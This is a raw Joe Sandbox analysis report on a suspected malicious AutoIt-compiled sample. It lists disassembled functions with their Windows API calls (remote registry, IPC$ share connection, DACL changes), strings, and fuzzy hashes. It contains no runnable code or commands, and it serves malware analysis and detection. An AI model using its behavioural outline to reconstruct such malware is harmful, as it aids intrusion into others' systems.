                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0057D9BC,?), ref: 0055E7D5
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0055E7E5
                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0055E809
                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0055E834
                                                                                  • DeleteObject.GDI32(00000000), ref: 0055E85C
                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0055E872
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 3840717409-0
                                                                                  • Opcode ID: 5b596681f869ce2f64a5fa7a18b8db8986e767ae0fd7a4ad9f960d694ae1065f
                                                                                  • Instruction ID: 4cccc6f6077f66ce776fcc028094cb141ab9669a653e77e470007eebc751f6b3
                                                                                  • Opcode Fuzzy Hash: 5b596681f869ce2f64a5fa7a18b8db8986e767ae0fd7a4ad9f960d694ae1065f
                                                                                  • Instruction Fuzzy Hash: 15416D75600204FFDB119F65DC49EAA7BB9FF99711F104059F909D7260D7309E49EB20
                                                                                  Function 005405F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __wsplitpath.LIBCMT ref: 0054076F
                                                                                  • _wcscat.LIBCMT ref: 00540787
                                                                                  • _wcscat.LIBCMT ref: 00540799
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005407AE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 005407C2
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 005407DA
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 005407F4
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00540806
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                  • String ID: *.*
                                                                                  • API String ID: 34673085-438819550
                                                                                  • Opcode ID: 555e6c3cb2b1775605cf93a9ee345652c2f6b8dc64887c364e53c01cc8f9eaf5
                                                                                  • Instruction ID: 19ac1e88b149d97caa08c28951f8d6b9c98c743a49ca0dd9ca5576c85396ddcd
                                                                                  • Opcode Fuzzy Hash: 555e6c3cb2b1775605cf93a9ee345652c2f6b8dc64887c364e53c01cc8f9eaf5
                                                                                  • Instruction Fuzzy Hash: 0B81A2715043059FDB20DF64C4449AEBBE4BFC8348F255C2EFA8AC7291E634DD858B92
                                                                                  Function 0055EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0055EF3B
                                                                                  • GetFocus.USER32 ref: 0055EF4B
                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0055EF56
                                                                                  • _memset.LIBCMT ref: 0055F081
                                                                                  • GetMenuItemInfoW.USER32 ref: 0055F0AC
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 0055F0CC
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0055F0DF
                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0055F113
                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0055F15B
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0055F193
                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0055F1C8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1296962147-4108050209
                                                                                  • Opcode ID: 243ec304bbde24858ab09577843eabaa74ebe5c6b0d54c2152e98c68a6502dea
                                                                                  • Instruction ID: fb3453a9b4e2efc95b5274173569af1a18b522c5aa7da1615083e357bbcd43bb
                                                                                  • Opcode Fuzzy Hash: 243ec304bbde24858ab09577843eabaa74ebe5c6b0d54c2152e98c68a6502dea
                                                                                  • Instruction Fuzzy Hash: EF818A71104302AFD724CF14D8A9A6ABFE9FF88315F10092EF99997291D730D949DBA2
                                                                                  Function 0052A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0052ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0052ABD7
                                                                                    • Part of subcall function 0052ABBB: GetLastError.KERNEL32(?,0052A69F,?,?,?), ref: 0052ABE1
                                                                                    • Part of subcall function 0052ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0052A69F,?,?,?), ref: 0052ABF0
                                                                                    • Part of subcall function 0052ABBB: HeapAlloc.KERNEL32(00000000,?,0052A69F,?,?,?), ref: 0052ABF7
                                                                                    • Part of subcall function 0052ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0052AC0E
                                                                                    • Part of subcall function 0052AC56: GetProcessHeap.KERNEL32(00000008,0052A6B5,00000000,00000000,?,0052A6B5,?), ref: 0052AC62
                                                                                    • Part of subcall function 0052AC56: HeapAlloc.KERNEL32(00000000,?,0052A6B5,?), ref: 0052AC69
                                                                                    • Part of subcall function 0052AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0052A6B5,?), ref: 0052AC7A
                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0052A8CB
                                                                                  • _memset.LIBCMT ref: 0052A8E0
                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0052A8FF
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0052A910
                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0052A94D
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0052A969
                                                                                  • GetLengthSid.ADVAPI32(?), ref: 0052A986
                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0052A995
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0052A99C
                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0052A9BD
                                                                                  • CopySid.ADVAPI32(00000000), ref: 0052A9C4
                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0052A9F5
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0052AA1B
                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0052AA2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3996160137-0
                                                                                  • Opcode ID: 34945f451174d850bf9cc6238dc05f2396691e9132cc679230a1f71e40e7e3b8
                                                                                  • Instruction ID: 6c064632e7e0e8d6d22b4e455e4df573d422c9ab00552cf7ffd31cc3f2a0876b
                                                                                  • Opcode Fuzzy Hash: 34945f451174d850bf9cc6238dc05f2396691e9132cc679230a1f71e40e7e3b8
                                                                                  • Instruction Fuzzy Hash: A8518F7190021AAFDF04DF91EC48EEEBBB9FF05300F048119F915A7290EB319A45DB61
                                                                                  Function 00549DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00549E36
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00549E42
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00549E4E
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00549E5B
                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00549EAF
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00549EEB
                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00549F0F
                                                                                  • SelectObject.GDI32(00000006,?), ref: 00549F17
                                                                                  • DeleteObject.GDI32(?), ref: 00549F20
                                                                                  • DeleteDC.GDI32(00000006), ref: 00549F27
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00549F32
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                  • String ID: (
                                                                                  • API String ID: 2598888154-3887548279
                                                                                  • Opcode ID: 7cb3aecf1b9ac4e3a17793a0153fcd66a7809cdc87d673c602fe42429bb37721
                                                                                  • Instruction ID: e03fa7595fd93ab79cf063f521ec892cd0d87da8a5d0cee32d53f1bf3fad861a
                                                                                  • Opcode Fuzzy Hash: 7cb3aecf1b9ac4e3a17793a0153fcd66a7809cdc87d673c602fe42429bb37721
                                                                                  • Instruction Fuzzy Hash: B4514775900309AFCB14CFA8D889EAEBBB9FF48310F14881DF959A7250D731A944DBA0
                                                                                  Function 0053CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 2889450990-2391861430
                                                                                  • Opcode ID: 3700f6b7e80e60be624f64179118b072bcf0cd02b7d8b07581ea82cd94844638
                                                                                  • Instruction ID: a2fd9fa88b9e5e55a767d3885b013119370723da66d6d09df2f9cda072d5533a
                                                                                  • Opcode Fuzzy Hash: 3700f6b7e80e60be624f64179118b072bcf0cd02b7d8b07581ea82cd94844638
                                                                                  • Instruction Fuzzy Hash: 1F51703180050DAADB15FBE1DE46EEEBB78BF15308F10016AF605720A2EB356F59DB64
                                                                                  Function 0053CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                  • API String ID: 2889450990-3420473620
                                                                                  • Opcode ID: b98c0726b3d3d7c9aa1b99df5dda67077c43b1cc5c20186002c064c50892b69b
                                                                                  • Instruction ID: 1ff24c45a4f786d1f9a8e8615e564380245347f749466c2addbeeb6afd1a548d
                                                                                  • Opcode Fuzzy Hash: b98c0726b3d3d7c9aa1b99df5dda67077c43b1cc5c20186002c064c50892b69b
                                                                                  • Instruction Fuzzy Hash: 2851813180050DAADB15FBE1DE46EEEBB78BF14308F50016AF605720A2EB346F59DB65
                                                                                  Function 00553C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: $EZ$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                  • API String ID: 3964851224-1024664198
                                                                                  • Opcode ID: 19803a8fa31b66d9d1aa18cdacfac407b7cff2985d8255fb0d4f865e673a9636
                                                                                  • Instruction ID: 902d88b8428607c79362c14b67cddb7bf00b40e3cc7a74493a737a80b95f1435
                                                                                  • Opcode Fuzzy Hash: 19803a8fa31b66d9d1aa18cdacfac407b7cff2985d8255fb0d4f865e673a9636
                                                                                  • Instruction Fuzzy Hash: 6E41233051024A8BDF04EF54D8615EE3F75BF96381F60485DEC591B192EB75AE0ECB50
                                                                                  Function 005355BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 005355D7
                                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00535664
                                                                                  • GetMenuItemCount.USER32(005B1708), ref: 005356ED
                                                                                  • DeleteMenu.USER32(005B1708,00000005,00000000,000000F5,?,?), ref: 0053577D
                                                                                  • DeleteMenu.USER32(005B1708,00000004,00000000), ref: 00535785
                                                                                  • DeleteMenu.USER32(005B1708,00000006,00000000), ref: 0053578D
                                                                                  • DeleteMenu.USER32(005B1708,00000003,00000000), ref: 00535795
                                                                                  • GetMenuItemCount.USER32(005B1708), ref: 0053579D
                                                                                  • SetMenuItemInfoW.USER32(005B1708,00000004,00000000,00000030), ref: 005357D3
                                                                                  • GetCursorPos.USER32(?), ref: 005357DD
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 005357E6
                                                                                  • TrackPopupMenuEx.USER32(005B1708,00000000,?,00000000,00000000,00000000), ref: 005357F9
                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00535805
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3993528054-0
                                                                                  • Opcode ID: 1b952d89dc1ca5300695ae98ba11275d66a6d73d36edc4b4aeb0ed4f6d8693c3
                                                                                  • Instruction ID: 59064f412d6057492814560c52cc4cdd5750ff0dbde3e6a28abfff9069101558
                                                                                  • Opcode Fuzzy Hash: 1b952d89dc1ca5300695ae98ba11275d66a6d73d36edc4b4aeb0ed4f6d8693c3
                                                                                  • Instruction Fuzzy Hash: A1712670640A05BFEB209F55DC4AFAABFB5FF40364F240205F618AA1E0D7706C50DBA4
                                                                                  Function 0052A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0052A1DC
                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0052A211
                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0052A22D
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0052A249
                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0052A273
                                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0052A29B
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0052A2A6
                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0052A2AB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                  • API String ID: 1687751970-22481851
                                                                                  • Opcode ID: 06cea468d397aad29bab58faf6ea008484e286e5d90cc33862319d340868d1d3
                                                                                  • Instruction ID: af369ccb4a0932e3059e7863750893ff08f535fe071488c244031bbd8c9fbc17
                                                                                  • Opcode Fuzzy Hash: 06cea468d397aad29bab58faf6ea008484e286e5d90cc33862319d340868d1d3
                                                                                  • Instruction Fuzzy Hash: 1C41F976C1062DABDB11EBA5EC85DEDB7B8FF15304F00402AF905A31A1EB74AD45DB90
                                                                                  Function 005367E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __swprintf.LIBCMT ref: 005367FD
                                                                                  • __swprintf.LIBCMT ref: 0053680A
                                                                                    • Part of subcall function 0051172B: __woutput_l.LIBCMT ref: 00511784
                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00536834
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00536840
                                                                                  • LockResource.KERNEL32(00000000), ref: 0053684D
                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 0053686D
                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0053687F
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0053688E
                                                                                  • LockResource.KERNEL32(?), ref: 0053689A
                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 005368F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                  • String ID: 5Z
                                                                                  • API String ID: 1433390588-3451842240
                                                                                  • Opcode ID: 342519ad5bf49cb245f08c51f1b6fd9f8a9ac6efd57a25b6ea81ee441e561e41
                                                                                  • Instruction ID: dd345a5a0ec3eb56790cc87e49848e8dd05985779b4b8d86436e61219d9a29bd
                                                                                  • Opcode Fuzzy Hash: 342519ad5bf49cb245f08c51f1b6fd9f8a9ac6efd57a25b6ea81ee441e561e41
                                                                                  • Instruction Fuzzy Hash: B7318F7590021ABBDB109F60ED59EBEBFB8FF08340F008429F906D2151E730DA55EA70
                                                                                  Function 005325B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005636F4,00000010,?,Bad directive syntax error,0058DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 005325D6
                                                                                  • LoadStringW.USER32(00000000,?,005636F4,00000010), ref: 005325DD
                                                                                  • _wprintf.LIBCMT ref: 00532610
                                                                                  • __swprintf.LIBCMT ref: 00532632
                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005326A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                  • API String ID: 1080873982-4153970271
                                                                                  • Opcode ID: 57b8bef2b1de41d971e8fb11903faec12b47c2822e9615b9aedb60b912d65c97
                                                                                  • Instruction ID: 72323fde936a19cbb40d97e7d38ac7207b0b0c2d469f6c642ac7abd73c8454b2
                                                                                  • Opcode Fuzzy Hash: 57b8bef2b1de41d971e8fb11903faec12b47c2822e9615b9aedb60b912d65c97
                                                                                  • Instruction Fuzzy Hash: 5F215E3180021EBFDF11AF90DC4AEFE7B79BF19308F00045AF605660A2DA75AA58DB64
                                                                                  Function 00537AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00537B42
                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00537B58
                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00537B69
